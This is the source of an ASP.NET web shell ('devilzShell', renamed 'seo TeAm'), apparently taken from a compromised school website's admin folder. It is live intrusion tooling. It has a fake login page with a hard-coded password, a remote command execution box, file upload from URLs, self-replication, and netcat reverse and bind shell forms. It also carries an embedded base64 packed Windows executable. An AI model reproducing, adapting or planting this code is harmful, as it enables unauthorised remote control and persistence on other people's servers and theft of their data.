type=""text/javascript"">" & _ "function updateInfo(boxid,typ){" & _ " if(typ == 0){" & _ " var pola = 'example: (using netcat) run "nc -l -p __PORT__" and then press Connect'; " & _ " }" & _ " else{" & _ " var pola = 'example: (using netcat) press "Listen" and then run "nc " & xServerIP & " __PORT__"'; " & _ " }" & _ "" & _ " var portnum = document.getElementById(boxid).value;" & _ "" & _ " var hasil = pola.replace('__PORT__', portnum);" & _ " document.getElementById(boxid+'_').innerHTML = hasil;" & _ "}" & _ "" & _ "function show(boxid){" & _ " var box = document.getElementById(boxid);" & _ " if(box.style.display != 'inline'){" & _ " document.getElementById('xnewfile').style.display = 'none';" & _ " document.getElementById('xnewfolder').style.display = 'none';" & _ " document.getElementById('xnewupload').style.display = 'none';" & _ " document.getElementById('xnewchild').style.display = 'none';" & _ " document.getElementById('xnewconnect').style.display = 'none';" & _ " box.style.display = 'inline';" & _ " box.focus();" & _ " }" & _ " else box.style.display = 'none';" & _ "}" & _ "function highlighthexdump(address){" & _ " var target = document.getElementById(address);" & _ " target.style.background = '" & shell_color & "';" & _ "}" & _ "function unhighlighthexdump(address){" & _ " var target = document.getElementById(address);" & _ " target.style.background = 'none';" & _ "}" & html_onload & _ "</scrift>" html_script = Replace(html_script, "scrift", "script") html_onload = "" Dim bportC, lportC As String If (auth) Then If (Request.QueryString("bportC") <> "") Then bportC = Request.QueryString("bportC") Else bportC = shell_fav_port End If If (Request.QueryString("lportC") <> "") Then lportC = Request.QueryString("lportC") Else lportC = shell_fav_port End If html_title = shell_title & " " & xCwd html_head = "" & _ "<title>" & html_title & "</title>" & _ "<link rel=""SHORTCUT ICON"" href=""" & Request.ServerVariables("SCRIPT_NAME") & "?img=icon"" />" & _ "" & shell_style & html_script headwrapper.InnerHtml = html_head serverinfo.InnerHtml = xHeader & "" & _ "<div class=""fpath"">" & _ xdrive() & xparsedir(xCwd) & _ "</div>" xnewconnect.InnerHtml = "<form method=""get"" action=""?"" style=""display:inline;margin:0;padding:0;"">" & _ "<table class=""tblBox"" style=""width:100%;"">" & _ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" & _ "<tr><td style=""width:130px;"">BackConnect</td><td style=""width:200px;"">" & _ "Port <input maxlength=""5"" id=""backC"" onkeyup=""updateInfo('backC',0);"" style=""width:60px;"" type=""text"" name=""bportC"" value=""" & bportC & """ />" & _ " <input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnConnect"" value=""Connect"" />" & _ "</td>" & _ "<td><span id=""backC_"" class=""msgcon"">example: (using netcat) run "nc -l -p " & bportC & "" and then press Connect</span></td>" & _ "</tr>" & _ "" & _ "<tr><td>Listen</td><td>" & _ "Port <input maxlength=""5"" id=""listenC"" onkeyup=""updateInfo('listenC',1);"" style=""width:60px;"" type=""text"" name=""lportC"" value=""" & lportC & """ />" & _ " <input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnListen"" value=""Listen"" />" & _ "</td>" & _ "<td><span id=""listenC_"" class=""msgcon"">example: (using netcat) press "Listen" and then run "nc " & xServerIP & " " & lportC & ""</span></td>" & _ "</tr>" & _ "</table>" & _ "</form>" xnewfolder.InnerHtml = "<form method=""get"" action=""?"" style=""display:inline;margin:0;padding:0;"">" & _ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" & _ "<table class=""tblBox"" style=""width:560px;"">" & _ "<tr><td style=""width:120px;"">New Foldername</td><td style=""width:304px;"">" & _ "<input style=""width:300px;"" type=""text"" name=""foldername"" value=""newfolder"" />" & _ "</td><td>" & _ "<input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnNewfolder"" value=""Create"" />" & _ "</td></tr>" & _ "</table>" & _ "</form>" xnewfile.InnerHtml = "<form action=""?"" method=""get"" style=""display:inline;margin:0;padding:0;"">" & _ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" & _ "<table class=""tblBox"" style=""width:560px;"">" & _ "<tr><td style=""width:120px;"">New Filename</td><td style=""width:304px;"">" & _ "<input style=""width:300px;"" type=""text"" name=""filename"" value=""newfile"" />" & _ "</td><td>" & _ "<input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnNewfile"" value=""Create"" />" & _ "</td></tr>" & _ "</table></form>" xnewchild.InnerHtml = "<form method=""get"" action=""?"" style=""display:inline;margin:0;padding:0;"">" & _ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" & _ "<table class=""tblBox"" style=""width:560px;"">" & _ "<tr><td style=""width:120px;"">New Shellname</td><td style=""width:304px;"">" & _ "<input style=""width:300px;"" type=""text"" name=""childname"" value=""" & shell_name & ".aspx""; />" & _ "</td><td><input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnNewchild"" value=""Create"" />" & _ "</td></tr>" & _ "</table>" & _ "</form>" headertop.InnerHtml = "<a href=""?"">" & shell_title & "</a>" uploadform.Action = "?dir=" & xCwd dir.Value = xCwd Else html_title = shell_fake_name html_head = "<title>" & html_title & "</title>" & shell_style html_body = "" & _ "<div style=""margin:30px;"">" & _ "<div>" & _ "<form action=""?"" method=""post"">" & _ "<input id=""cmd"" type=""text"" name=""passw"" value="""" />" & _ " <input type=""submit"" name=""btnpasswd"" value=""Ok"" />" & _ "</form>" & _ "</div>" & _ "<div style=""font-size:10px;"">" & shell_fake_name & "</div>" & _ "</div>" headwrapper.InnerHtml = html_head mainwrapper.InnerHtml = html_body End If End Sub </script> <html> <head id="headwrapper" runat="server"> <title></title> </head> <body onload="setfocus();"> <div id="mainwrapper" runat="server"> <div id="wrapper"> <h1 onmouseover="this.style.cursor='pointer';this.style.cursor='hand';" onclick="window.location= '?';" runat="server" id="headertop"></h1> <div class="box"> <div id="serverinfo" runat="server"></div> <div class="menu"> <a href="javascript:show('xnewfile');"><span class="gaul">[ </span> New File<span class="gaul"> ]</span></a> <a href="javascript:show('xnewfolder');"><span class="gaul">[ </span>New Folder<span class="gaul"> ]</span></a> <a href="javascript:show('xnewchild');"><span class="gaul">[ </span>Replicate<span class="gaul"> ]</span></a> <a href="javascript:show('xnewupload');"><span class="gaul">[ </span>Upload<span class="gaul"> ]</span></a> <a href="javascript:show('xnewconnect');"><span class="gaul">[ </span>BindShell<span class="gaul"> ]</span></a> </div> <div class="hidden" id="xnewconnect" runat="server"></div> <div class="hidden" id="xnewfolder" runat="server"></div> <div class="hidden" id="xnewfile" runat="server"></div> <div class="hidden" id="xnewupload"> <form runat="server" id="uploadform" method="post" action="" enctype="multipart/form-data" style="display:inline;margin:0;padding:0;"> <table class="tblBox" style="width:560px;"> <tr><td style="width:120px;">Save as</td><td><input style="width:300px;" type="text" name="ufname" id="ufname" value="" runat="server" /></td></tr> <tr><td style="width:120px;">From Url</td><td style="width:304px;"> <input style="width:300px;" type="text" name="fileurl" id="fileurl" runat="server" value="" /> </td><td><input style="width:100px;" type="submit" class="btn" name="btnNewUploadUrl" value="Get" /></td></tr> <tr><td style="width:120px;">From Computer</td><td style="width:304px;"> <input style="width:300px;" type="file" name="filelocal" id="filelocal" runat="server" /> </td><td> <input style="width:100px;" type="submit" class="btn" name="btnNewUploadLocal" value="Get" /> </td></tr> </table> </form> </div> <div class="hidden" id="xnewchild" runat="server"> </div> <div class="bottomwrapper"> <div class="cmdbox" id="cmdbox" runat="server"> <form action="?" method="get"> <input type="hidden" name="dir" id="dir" value="" runat="server" /> <table style="width:100%;"><tr> <td style="width:88%;"><input type="text" id="cmd" name="cmd" value="" style="width:100%;" runat="server" /></td> <td style="width:10%;"><input type="submit" class="btn" name="btnCommand" style="width:120px;" value="Execute" /></td></tr></table> </form></div><div class="result" id="resultbox" runat="server"></div></div></div></div></div> </body> </html>
File Name : E:\Inetpub\vhosts\sunriseits.com\lakshinternationalschool.com\admin\popup\seo.aspx<% '# '# devilzShell <[aspx]> '# ^^^^^^^^^^^^ '# author: b374k '# greets: devilzc0der(s) and all of you who love peace and freedom '# '# '# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ '# Jayalah Indonesiaku %> <script runat="server"> '################# VARIABLES GOES HERE #######################=============================================] Dim shell_name As String = "seo TeAm" Dim shell_fake_name As String = "Login" Dim shell_title As String = " :: " & shell_name & " ::" Dim shell_version As String = "v1" Dim shell_password As String = "seobarbar1337" Dim shell_fav_port As String = "12345" Dim shell_color As String = "#374374" </script> <%@ Page Language="VB" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%> <%@ import Namespace="System.IO"%> <%@ import Namespace="System.Diagnostics"%> <%@ import Namespace="Microsoft.Win32"%> <%@ import Namespace="System.Net.Sockets" %> <%@ import Namespace="System.Net" %> <%@ import Namespace="System.Runtime.InteropServices"%> <%@ import Namespace="System.Text.RegularExpressions"%> <%@ Import Namespace="System.Threading"%> <script runat="server"> '################# RESOURCES GOES HERE #######################=============================================] Dim icon As String = "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAB/klEQVR42o2RS2gUQRCGq7rHB0rw" & _ "4miwFWVmPSmIHpaQSwQD4ivGKHsImIOyBhJETUDjRaMIEjTk4gNFIutBwScY8eBh9aBgyCGCiKu4" & _ "E4kzBk0uimiI21XWwgbMorOppumuKuqr6r8RZmnjxl8iR0H2DzfKT03HsVLhV+Ove4rc8xk4uYtx" & _ "dCHgGQHc/SdAuqwZB9jCAE7RnwLGR8hHbiK5/aQzCcC0FP/+u2YG4KPx2+p14SKVTbFIiPdI7/ei" & _ "oL98whmAt8bv3O7Y89sIv29kzOpSvENR41lSD1Jh0BQLeGf8jq3a9nayetX2KVhfeta8Gm0nuwgH" & _ "0+FITSxgzPgtm3Qhs5qR+kgfqwIYGgVuTmk60EPq/p4w2B0LkG5+l7I5Ud3BUsoBBlc0uEVOakWU" & _ "vxMLKNqA8V4c0rZWyZ0lzbI2M9rTpNfKD+RiAV+MX9eiCs9+yV2ecLkacPgaUvcNxcuuWHW9Pgr2" & _ "xQJeGu9Us7YnjpMaFsE2FGOh8dN12l49SjjUGo4kYwE54x3eqW3fXlJjrawSMvLPN8brbtB08hyp" & _ "gaYwaIgFTJjE0l5l3wfAVRdIN4qQT8T/dht5btbq9pVR/lJFEUWHWhF9fnWUzxb9x8u9hwcV7ZjO" & _ "D1rHXRx9mPgvoNxkqjmTwKnXyMlVgAtcxucCyMwaUMn+AMvLzBHNivq3AAAAAElFTkSuQmCC" Dim bg As String = "iVBORw0KGgoAAAANSUhEUgAAAAMAAAADCAYAAABWKLW/AAAAJklEQVR42mNkAAIpKan/b968YWAE" & _ "MZ49ewamGdnY2P6LiIgwgAQA8xYNYheotNcAAAAASUVORK5CYII=" Dim wBind As String = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v" & _ "ZGUuDQ0KJAAAAAAAAAA0GAk5cHlnanB5Z2pweWdqmGZsanF5Z2rzZWlqenlnanB5ZmpNeWdqEmZ0" & _ "and5Z2qYZm1qanlnalJpY2hweWdqAAAAAAAAAABQRQAATAEDAIkLlD8AAAAAAAAAAOAADwELAQYA" & _ "ADAAAAAQAAAAQAAAYHIAAABQAAAAgAAAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAACQAAAA" & _ "EAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAACAAAAIAQAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFVQWDAAAAAA" & _ "AEAAAAAQAAAAAAAAAAQAAAAAAAAAAAAAAAAAAIAAAOBVUFgxAAAAAAAwAAAAUAAAACQAAAAEAAAA" & _ "AAAAAAAAAAAAAABAAADgVVBYMgAAAAAAEAAAAIAAAAACAAAAKAAAAAAAAAAAAAAAAAAAQAAAwAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAMy4wNABVUFghDQkCCbOeYU01Vb5H61QAAFUiAAAAYAAAJgMADCfk" & _ "//+DfCQEBXUIagD/FTBAQADCBACQuCx03/7/EgAA6AMABSxTVVZXaAAQI2gwUEAuHN1v396L0LkH" & _ "HgAzwI1GPPOruAQMv/aX3bsQBIlEJEADRI08M9tQUokf9naz/USJXCRQNgyheFYEvvdlJ/6v+/+D" & _ "+AGJdCQUfhyLDYQTUWkXg8QEZjvDbHf/7j4UdQQdjZQkrFNSagI+9Hb/ut+FwA+FQwI8PUcDfX5T" & _ "AGoB+777+x7olPA78zYYD4QeAptTSa3puq4ggBQHJAMoLCp7vm2b8GbHChwki0wkFFFA7U33Z+xU" & _ "JBBmvR4cUlBWdZDucpDczQFqChDkXjfsZryLLUTTThD+W/7t1taVIItuGI1MJBCNVFFG/vYgW5zg" & _ "dNPp5gIQaBAnABbOZhpHQP2IVNAbbt1HO9N0sJMQu4vxWSzBu///wukCXIvOg+ED86oPv0oKi1IM" & _ "i8EYMIvK956/Mhqli8ikxtEshG8IwckYzUYd6V67sBlO/wDm4Sxb5wYZ2DUYtFhA1d13lw12PAJo" & _ "BONSx4QkjNgBzn54cwtMnCSQ47QkmAacHtt8T6AAzzyNvDqDyf/G7nfcwmhQLvKu99FJiZ/GhACa" & _ "pum6GVwHRWVBY2marmlGeB9CbUfTme8GQwdkiJwMSA5E94s9Wy5mOIR6r1BR6bZN11oQ6wW2XFNS" & _ "1DSD6QpHdQ4A4dR3HP+QbgFFC8xfXl1bgcTj4Y5HNvkIg+wQ6DPtV8oKl7vH6AcUIBCJbM0U/mbr" & _ "Axw8TGg/AA8AVVVMRmr/LFQE+Dv9dHl/GldeePfZEwgdAAU7xXQF+tPrWfvdtNkUSD0kInVMVQBW" & _ "VZcOc7ddMv8BSWg4NzwQs22lf+iF7XQjlQFVTRQLbtvONQzWINa0Vltxc41LJRDCa6ldiS3t9mbJ" & _ "fHgBOT1sUgp+ESDvfnf6agiKBlBPKQjrEIsVYF4zyYoOj/Hf/YoESoPgCJgDRuvQgD4AdGa7iTSF" & _ "1n57u4AGQKMMOkY8InUYBgWy7X//dAtGhMB0Qgp19UbGBgA1mmUeO8lmyQ5RD6Fk0ooW+q0dWVB1" & _ "zh8/yXQC68tXOGloBxCUGAcANjrM3FIA+MfOzIDyH2v6ZYurg8cBfg8PtgdqCNle6X1ZWesOLGTF" & _ "QQr/9rKFwEfr0hU3R4P+LYvubGGt19oGKzUPdkMsZw/7DGoEVkALoTxwBP32798NjQSbjVxG0DDr" & _ "z4P9QsN1AvfYyb7b+pLD/0MENgSMWcPMAB0fo8BRPQJxCHIUgUIVv/2x3z4tEIUBF3PsK8iLxAyL" & _ "4YsIi+H/jYVAAsMh7FGLRQiNSAGB+QCfsHR7tncMvQ+3vutSt1b//+2v1w7B+QiB0fZEVgGAXnQO" & _ "gGX+AIhN/I3LduOIRf0g6wkN/UX82rXtj/ZYjU0KBRNRUI0QUAvfbrjQnQdmxBxOAsnDU0UKI0Wy" & _ "Y4HfDMl0av+qQVKUIuHGe/dkoQAAUGSJJQfgWFNi8SNceIll6Il0QKvUiRX4VNt3n95hyIHh/8gN" & _ "9A3B4QgDygrw3A+7P+gQo+wHM/ZFEVpZbrs3ug0wHAsG1ol1/AgPr+y79kkWoxhaBA8OfaPQVAls" & _ "22Z3DDAEC3cImSvQt6T3/zMNCEQWH4lFnPZF0AF0Brs0vS1w1OsDWlgddZxWoXALv2XXUCMDDKAI" & _ "CMZH7GVD6Q1VCYlNmOzOCZs2F77dw4vHdZge1+3YVHUFWO0g7A0TaLwToQmVbAhz5XhSLyRZJXhL" & _ "OBEC7ADu7jYbxAiLC8gFDHUJDwT34dv43TqrUwWL2B33ZK0DCZzgLjCE01safxh8eHKEGKHcU9s7" & _ "NdgsbHA+zeReVhF7f6TOM/yAInQEi8brHRsY+WSDZwxTiHyEzgAtvMG7AlijQ2wCdSQcHGVbMN1J" & _ "BaFEvBEUAhDYMSuVDDkzqQiHt18LmGzglCRdGBmhVGObbU/0RY1TLEEg+InW0HQbwFRAhBg3wb/x" & _ "b18f4FZ0Y4ld/I08IceDwAMkdmEXi/wNwIv00NxXzDhKy46FFPwMW6PBxkY7kdQqg7//ydrs1ukp" & _ "SeBWXxxVPHOtc1IRFNeg7esCnYULXUNlbU3wJg2JCG8sgVvIoRRaCNgH80Bh0BohCPquIV+DgZQO" & _ "AD5ndg2nwxjQDI4I6BC5tU3IAVcPX7koVbM9Ond1ERh6LGUGhHBxoSEIDNSLXAmd/d0VpCKIHSAo" & _ "PKEQgyI/+98tuAwJVo1x/DvwchOLBpeD7gQ7hnyFvzUic+1e8pQUw5d8N25oIBAchdtbC61nxDp6" & _ "iYZwX8MFtSfbdRI7qnMNV8YE61HCtms4yp4IPgrcGFn4N1v7xSBwWAhIChWD+wXlDd0LWYNgCOpY" & _ "4wrZg/uNktvMhPauLGEsvbbrY6VNQguLSASDZ4XIHf/NrTT4EAUV/APRVjvKfRWNNPC33e1JK9EE" & _ "tYgSgyYCxgxKdfeL3bYOdngEU7eOM8BpxwWfAXv3DINA63A9kBKBXT0B+RmQkYRKPZP5GZCfhTc9" & _ "jYIkPY9Onp8BhhE9kgqKay2MnZ2IarXTdAprwH0fWV7rCPpREWOj41lwFPiDyP8xbFko1yi5uFtd" & _ "w+RGUS7ufbtGOWjZVrgFdO3r7Rv8n4DADDvGcwQ5EN2NDEleA+xyfL+NFTvBEnSWMwhaeBk4sgAZ" & _ "WrHkRDPxkQ4likYBJ002Gy7QIBHAwFCnFVR05vi2lSVa4yENBwo8IHa6rr2VTQwgd/o0KAQP6fUu" & _ "LZTZ21MnOR1a29cWrA5bWtAT/yc6An/6SyESPD10AUddGxxZjSL8Tm3wAevorL1hZhqcA25HW3tZ" & _ "5zUI9Y7sfwtPCcYHPUE4H3Q5VVc5it2+RUhZRYA/SSJVNLZYtlB5PAYuOzaxb3f8eKxZblkD/Td1" & _ "yV3/hEPpt30WdisdC4kejYc2Bl84qWFb1FG9rxi5V74wii2pP7bDqZATKaIYfP44g61ChRhNJ874" & _ "vNoGrxV1n6yLDy0N2zag/NiI1KgYtWGTrtahCC8n2zWs1SSGMTVwFEhazuVuZgCco/ylL5hSu7Vt" & _ "TBgcFJSDIXJqjlhji0p9VLUgrdVLpYV4dzeDx1MU8gv/woA4m0SKUAFAgPq+KYTSdCUX3rj90vaC" & _ "4VdHBHQ9AYX2cIoQHTsy9ogWRkAL1evODASAyNjtLR1GQBzrQx4Ff0vetgRARNr2gxkYiB5e3pq7" & _ "RmUgdAkJCAl1zHUDSLY3jjW7Smb/gGUYAE4A+75mlrbgRCsFJwNeeGBmbPEXyLyLVbbCaxffAsfQ" & _ "14UiXNH49y3wQEPr95Is9sMBltzaX7hBOX1tDYB4ASKN4x2Lwihh2EpbNwgM7u/2t98YGA+UwokF" & _ "0euL00uFkw5DiNpboULXBbFLdfOA30Zr5KcgP1UKij+su9Q2dDoPZ3QuKBniwgkTBgYfGw9AsGtz" & _ "AwMVAUCQDbWr3deGMA8Og8cDg/eUmgFDo+H7oOOFDm5JoTSIU7stpEBNNgftwT3AzATV+j3XAS0W" & _ "Ie3rKGYWTpZvVPsX6hszsgNzAuIPWoHdbLMOQww/J8JmOR5t0Forc+s7CPv5NnZLnwbyK8YvUE7R" & _ "+I5A0h2w0QJdUys0/9c1KVdL+jvrdDIyC41qroFbHFVQuyQlIW2D1L1WDBAnXAmL9sTP1gNWnpjD" & _ "61OVTKUSpZO5hbF0PGBD0vZv+3QKQDh7+wT2K8dAalXOUolWWKr7Rrp05WCk9ZyzDpRfPDrxxiCV" & _ "w+ww7HCCRIsROmHTpKllMhsVWUAY4DXAsgBaIB6GKfutbNy0cxptBLbGRgUKoSNC7u/S9QgFG+vi" & _ "jeGYTh1NDGYJQnXFNen3RQnCbrkLMI3cu/1XYrhKSo0cLnwCdjk1Yz6wzP19Ur8ETI8AOIPS/NjP" & _ "f4kHjYh+wXMYgGAIGHuBy0CLD3YIgcF85BVif+bVSXy76waLCfvxL2y80X5Giyr4ZDaKTQD2wQEw" & _ "oe6tfgQIdQulsB6lCo2/0MeLz8H4BY1Vy3Qv1HrPIaULiQgviDVe4hvrR0WDw5v+fLpQKPECn+w8" & _ "2P/y2HVNOxa3b10ABIG0avZY64jDSPW7HaE7wPVYrKiD/3MXV2b9MFInDCUVPtAGgE4r89YoauoK" & _ "A3UK8MW+xG4EBYBDdAN8m/+4Ajwrszao0kTDhXrVUYN3GWgceGRrUHYgVbSj6FjcOjY8hS4e0UoP" & _ "POhY6JAD86BySL9YONF7/OdV2Gi02PRYuCEeCC5SXTqL5afujjrbTItBBAaeuB3rvozRdA+tVIkC" & _ "uAMQwz7Njv6hi9lq/mi8IYn/NQDFLrogGSBKi3C+sOO2QP7xLjvadCghdosMs4XbVgmpbUgXfLOx" & _ "/fbv+3USaAEBLbN9Em7/VAjrw2SPBQjtnONDooznZIu2t+DS94F5BGh1DVEMpTlRmLh7C7EFm4pR" & _ "uxSF2woEK3EIqGFLArdGfGtD0GsMWVt371ZD6G/D/TIwWEMwMPfjCPr8i11Yii3ll1hA5NmC5qB1" & _ "cIkxReEPCInvsrU+IXN7CMFhulv7l212sY90RVZVjWsQqAtdI7oXul5BC8QzeDwlU14DxrpyEZgd" & _ "VgzatWOyFVw2b96PSnznum2PVQw7CDAaizSP66HqHftq9nwcyesVXEOITVbgP10WlLVCb2i8O4sp" & _ "i0H2A151yRoQJOGhe60aCrihmfIqinWs3M98UiFo/D6GoThWj2DUy1nwdZzwH/5g14HspIRVCDPJ" & _ "uCjY3bTVPjuQC0JBPbgMfPG5hfe3lfHB5gM7lhomHCpJZ5aGbLzocA3X9h66ENeo+nUL8SBsRGLh" & _ "hVw+/7kpAOXBukm6MBMX/ENALXF2FiZZEleSvWdvx+IHYUBZZTx2KRlQL3B2FnT4DYNGagMDN7Op" & _ "7vho+EFXqCesVWD/xs6SNNwQVwy8zP2QwR3YvP+2LNMWzFSr2REKBCfBL98ZsFkaLF/rJo2Emhor" & _ "azBq1zY7TdOk3Qhq9Nx/xF5OTUOAyeQtDEdLpo0mCEfFij8x+apEKf6D+gRyLffZVHRvvv9fE4gH" & _ "R0l1+ovIweAIA8EGEMqD4gPXXaIUewPzqzoGIw4o5UxKPs0ixDnJVo0EFWVP3ICuHhaKQ4SIJHVb" & _ "0ISBHGZTDglFhgOuq2ohIzvkeCQzUqQB/wUY9poBfvAXLyE1uLQQfXCiFbgi/N5WLJd3/AnSuMgV" & _ "OTB0cjBCVFGaYuEN6Nuc99YVIxgkvkBjWb/ggtAWewnT6AGJUMOqcXOjtenkgA+G74B97rG1+NMZ" & _ "u03vihEPDK6x9038LLZB/+Q7wg+HkyXHW21ZAw7uUkg/Uux+owEsiwSqjZ7YkYA7v03ob7TLdCyK" & _ "UQFkhbb6O8d3t2/3jRTJ/IqSwCAIkEZAE3b1bBu68EFBgDkY1P/cwwid/EGWMC2Ewfz9zG0WHt5Q" & _ "o6wLeeTMv8B07P7eD6WlWaO7petVQHn//0g9fWZwGkKhCEA9SnKwbBYrIzksVDbWXmtx+gvCTasA" & _ "voLb6OsN2FwKmzCs4KpQ+wTVHUFbangfHpXfgyUhVf4jPMjW6ktc/yV4av0oMHJhFGz85RaxZSdy" & _ "GUn1UKmUgameKii0wbY2FwQNbkggdjZTOwG4BOkFEgsgLzzPCBFXbFkzwN4bIdiqtBejxdwbBs76" & _ "w18zFKQE7AaMCI1W9+cKFgumfz80wL6HiIQF7KyCxqW6+v5y9IpF8saFDSCpN6Mv4erGjVVgtgra" & _ "v3cdKxi0e+zIjbwqQbggAIvZlzb99s/LQkKKQv80ddBfW2qd7PpYa/YagzWNejFWnbFgxFa1I/2y" & _ "m032HVYeVjQjKKqwQ1cy/GjvJ39bsBReXD2NcmaLEb+fsMD2wmAW+hCKlAVkiJBO3gqY4L8aAnQQ" & _ "IMZbAHdbpqAcgWHCDY08AL/rSRUlf1hju0FyGQRaqkvIgMEgiJOXt7GISR8dYXITencOrm7YmyDp" & _ "IOvgTEq+ZeHXgwE6Emr9CJZZ/F+dYHIIWvQDJNCogR+XHw/2VhoWLVg+Zx86Xr0TQMN6HbyxsNdI" & _ "fMscJ2qNpCTC/7us4ZH4V/fBA/6KAUG2Ow4S/f//dfGLAbr//v5+A9CD8P8zwoPBBKm/ht9t8IF0" & _ "6Jf8JiOE5HQaqUh0gR4d6Kmno82Ny8tboz/+BP7rCP3rA/zaGswR9l8ZC0EM/WBvxWSIF0di7usF" & _ "iRe+rBCsxWduaYNrN/a2m+EvNITkJ/fCaRIH2Qm0sWrHOC5mCLYlK9HG7gwIiAcjw9kIuHAqWsUb" & _ "9eiu/rHgdyIObTo6u23adRZkmJ6DFdoTKvneRbsbOEJYNcANdwtWGiJlqBRNPRwuA3ByCS/U/8rm" & _ "8FZqZEE4xAYAX16I0JCTFEAA5KS5SGMyJBNJtke4QbUrwcMJ/qbZZJL9/IbGoNBStFfFnU1SttEL" & _ "FMEQ0QPG1HbUMI3t+PgPgnhH98eMFIrQ/0I4kd9yKfOl/ySV6CwWKvDbYse6HIPpSMrgczO3JYjI" & _ "F4UABo34Tdc9XZAHfBAEPANgI7a3wMHRiszXiEcBBQIZW7bmVghZxsdczJaxZSeNSSslAQI7m+RZ" & _ "AqaQI0YhrjuQr0c/jN8GzAOapmmaxLy0rKScNN1C/79EjuSJl+QH6OjTNE3T7Ozw8PQC0zRN9Pj4" & _ "/BBafNgojZoD8HoJwDTb7//wAC0DDCAN7C3tWF5foJCdCwnBBZv5EaMN4e3DDAorjXQxZ3w5/H92" & _ "20sGJA394/x3gC7CeWtxRe+NMC6PF/mcTPkriC0swma67pCYC7gD4G0DOlvydbdvA05YT1a2S90u" & _ "Ydgfo+4C7wK8ZQPyKYyQJySNV7Ykqy0DrkXXXZiBWmBbNAY8A03TNE1ETFRcZHdpmmaELpccHBgY" & _ "pmmaphQUEBAMkKZpmgwICAQETdedsB+QBZgDqLwlOLeELpe3tYcDWwizD4MTIZlOCLdoQBnVDLkW" & _ "YHK0SFuts50luqwGsAUGwIzEo6iUoLrspd5CeKEY+YChtAfatDVgiLraVJJQDNcL7ZY1ACRyB2MU" & _ "6+hfZXIRIaPLnsX2VnKv8/ryK3EMWriD/7/AwvxXwe4Pi86LevxpyQSvS4l92Cjk3jCMAUSZILZN" & _ "xrcG3L0ME9UI+HV/wRGjQnz7aj9JXwsMO892qZELBXq7EwQ7Awh1SL2lIP+tf+hzHL9x0++NTAGO" & _ "1yF8sET+CXUu2Na7K3UhOeskdeAeLX0692AhvLDEEiQGeQSZsXLBUYd8EwoEje+2G8xd+A0IjIv7" & _ "wf8EZHRb29r/P3uGXy+94ZfsFWoAWiTQK6gFun/MEaGJVfhJWjvKpnb2/LmtdfPKQRv7QD47+nbb" & _ "UrstmPq/dGsuiVG+UTwyMmC9uurSIVRhwSKXER69LdYS8tIhlExSv1pZzrZJvkoLBAgRFS5s1JEn" & _ "7NUJOTOGfDMbpIkp8I0M+crWXPcLJokvDgUIol1q2ZdKY4cHBO/bRrtfzU0P/sGIC3Ml8w9GDnay" & _ "3b+7iIvP0+t2CRkNjUSxxW4V+wkY6ykkwE/gGWOH4J4lWQQPnYS3CVT6VsM4i1RFoxqJXBNXhngs" & _ "S3L6oXZMWqp8ot9/pFanQBTi9qZqDwNIDFKAAEPMXiN2klNRgB8y/rD3IBwJUAgOOUAQg6SI4uxu" & _ "9mwkD/5IQwpI6rE33OJ5QxODYAT+EYN4CLrXNt1DbFMQcAxaEgkQLXosLGD0D9hC4RjyBICSy8go" & _ "+sW/ofNMEexRjUgUUZsrHOP9dmVizv8NLzsFIjVPv7ZRtxSWOokNTOsidX5Pt6OsiTU1XClgkypm" & _ "L2gbn9yNYDyCLBtIF3bw/Ds6TBdqSTR9DoPO/9PugynHWy3t/+/06xAmgP+2wL0z9tPoDgOhaYvY" & _ "O99/u/AbfwhzGYtL4TsjKyP+C891C7td41Y+FDuaGHLnB3V520zI94vaO9gmFQXr5hklukV3dVkk" & _ "c7N7CEh3yLNzEzfr7SYNG7dfmbMv7hclbnuF23YXtDAWCCYfWVstbFut/IBDqDhsB91r1W0b6SNp" & _ 